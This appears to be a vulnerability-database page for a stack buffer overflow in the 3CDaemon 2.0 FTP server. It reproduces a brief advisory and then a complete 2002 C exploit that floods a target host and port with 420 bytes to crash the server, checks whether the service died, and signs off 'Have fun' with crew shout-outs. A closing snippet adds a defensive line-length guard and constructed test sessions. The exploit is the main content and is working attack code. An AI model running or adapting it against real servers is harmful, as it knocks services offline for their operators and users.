
3CDaemon 2.0 - Buffer Overflow Vulnerability (1)

01 Jul 2014 00:00:00 | Reported by: Root | Type: seebug | Source: www.seebug.org

The 3CDaemon 2.0 FTP server has a stack-based buffer overflow vulnerability: sending a large amount of data can crash the server or enable malicious code execution.

Code

source: http://www.securityfocus.com/bid/4638/info

3CDaemon is an FTP server developed by Dan Gill of 3Com.

Reportedly, it is possible to initiate a buffer overflow on a host running 3CDaemon.

Submitting an unusually large amount of data to the FTP server could trigger a stack-based overflow condition. This could potentially allow malicious users to execute arbitrary code on the server. However, sending random data could cause the application to crash.

/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
*  1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they're sent.
*
* Tested on:
* [OS]                                    [version]
*  Windows XP (5.1 - 2600)                 3CDaemon 2.0 revision 10
*
*  ###
* #####      ####                            ##
* ######    ######                         ######
* ######   ########   ########            ########      ######
* ######  ####### ### ###########          ########     #######
* ###### ######## #### ############        ########     #######
* ############### ##### ############        #######     #######
* ############## ######  ############       #######     #######
* ############## #######  ###########        ######    #######
* ############# ########  ### ########       ######  #########
*  ############ ### ####  ### #######        #################
*   ##### ###############  ##########        #################
*    ###  ######### #####  #########         ################
*    #### ######### ##### #########          ################
*     ### ######### #############            ################
*      ## #########  ######                  ######   #######
*          ### ####                          ######   #######
*                                            ######  ########
*                                            ######  ########
*    ####   ## ###### ###  ###        ###    ######  ########
*   ####### ########  ###  ####      #####    #####   #######
*   ###############   ###  ####      #####     #####  #######
*   ####### ########       ####      #####       ##     ###
*   ######  ######### #### ####      #####
*    #####   ######## #### ####       ####
*     ###### ######## #### ####   ### ####   ##
*      ########## ### #### #### ########## ######
*       ######### ### ###########################
*      ##########  ######## #####################
*    #############  ######  ########## ##########
*   ########  #####   ####  ###   ###  ###   ###
*
* I don't know if this will work on versions other than the one I tested it on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim ([email protected])
*/
#include <stdio.h>
#include <stdlib.h>     /* exit, atoi */
#include <string.h>     /* memset */
#include <strings.h>    /* bzero, bcopy */
#include <unistd.h>     /* write, close, sleep */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BOFSIZE 420

void banner(void) { printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n   ---\n"); }

void E(char *msg) { perror(msg); exit(1); }

int main(int argc, char *argv[])
{
    static char ownage[BOFSIZE];
    int sockfd, sockfd2, n;

    struct sockaddr_in server_addr;
    struct hostent *server;

    if (argc != 3) {
        fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]);
        exit(1);
    }
    banner();
    /* Fill the whole buffer; it is not NUL-terminated, so its length is
       passed explicitly to write() below. */
    memset(ownage, 'A', BOFSIZE);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) E("Error occured during opening socket");
    server = gethostbyname(argv[1]);
    if (server == NULL) E("Error occured during host lookup -No such host?-\n");

    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr,
         (char *)&server_addr.sin_addr.s_addr,
         server->h_length);
    server_addr.sin_port = htons(atoi(argv[2]));
    printf("Connecting to target FTP server... ");
    if (connect(sockfd,(struct sockaddr *)&server_addr,sizeof(server_addr)) < 0) { E("Error occured during connecting\n"); }
    printf("Connected, Probing BOF... \n");
    n = write(sockfd,ownage,sizeof(ownage));
    if (n < 0) { E("Error occured during writing to socket"); }
    close(sockfd);
    /* Reconnect after a pause to see whether the service still answers. */
    sockfd2=socket(AF_INET, SOCK_STREAM, 0);
    printf("Done, checking if server is dead.. \n");
    sleep(5);
    if (connect(sockfd2,(struct sockaddr *)&server_addr,sizeof(server_addr)) < 0) {
        printf("Couldn't establish connection: It seems like it died! =)\n");
        exit(0);
    }
    printf("Server is still alive. Perhaps its not vulnerable?\n");
    return 0;
}
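
A defensive counterpart to the crash condition described above, added here as an example and not taken from the original advisory or from 3CDaemon: a length guard that a filtering proxy in front of a legacy FTP server could run over control-channel bytes as they arrive. The 400-byte limit follows the "400+ chars" figure in the exploit comment; the `line_guard` struct, `guard_feed`, and both sample sessions are constructed for illustration.

```c
#include <string.h>

/* Assumption: page reports a crash at 400+ characters; refuse lines that reach it. */
#define FTP_LINE_LIMIT 400

struct line_guard {
    size_t cur_len;   /* bytes in the current, still unterminated line */
    size_t lines_ok;  /* complete lines accepted so far */
    int tripped;      /* latched once a line reaches the limit */
};

/* Feed one recv()-sized chunk; a line may be split across chunks.
 * Returns 1 when the connection should be dropped, 0 otherwise. */
int guard_feed(struct line_guard *g, const char *buf, size_t n)
{
    for (size_t i = 0; i < n && !g->tripped; i++) {
        if (buf[i] == '\n') {            /* CRLF or bare LF ends the line */
            g->lines_ok++;
            g->cur_len = 0;
        } else if (++g->cur_len >= FTP_LINE_LIMIT) {
            g->tripped = 1;              /* limit reached, no terminator yet */
        }
    }
    return g->tripped;
}

/* Constructed sample 1: an ordinary login whose commands are split mid-line. */
int sample_login(void)
{
    struct line_guard g = {0};
    const char *chunks[] = { "USER anon", "ymous\r\nPASS gue", "st@example.org\r\n" };
    int drop = 0;
    for (size_t i = 0; i < 3; i++)
        drop |= guard_feed(&g, chunks[i], strlen(chunks[i]));
    return drop == 0 && g.lines_ok == 2;   /* 1: both lines accepted */
}

/* Constructed sample 2: 420 filler bytes with no terminator, in two chunks. */
int sample_overlong(void)
{
    struct line_guard g = {0};
    char filler[210];
    memset(filler, 'A', sizeof filler);
    int first = guard_feed(&g, filler, sizeof filler);   /* 210 bytes: under limit */
    int second = guard_feed(&g, filler, sizeof filler);  /* 420 total: tripped */
    return first == 0 && second == 1;      /* 1: dropped only on second chunk */
}

int main(void) { return !(sample_login() && sample_overlong()); }
```

Because the counter persists across calls, a sender cannot stay under the limit by splitting an over-long line into small packets.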